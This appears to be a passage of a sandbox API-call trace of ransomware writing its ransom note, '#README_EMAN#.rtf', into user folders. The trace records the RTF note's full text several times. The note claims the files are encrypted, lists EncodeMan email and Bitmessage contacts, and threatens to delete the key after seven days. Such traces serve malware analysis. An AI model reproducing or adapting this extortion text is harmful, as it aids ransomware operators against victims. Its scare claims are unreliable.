th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.786] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.787] CloseHandle (hObject=0x284) returned 1 [0269.787] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\cache\\#readme_eman#.rtf")) returned 0xffffffff [0269.787] GetLastError () returned 0x2 [0269.787] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\cache\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.787] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.787] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.787] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 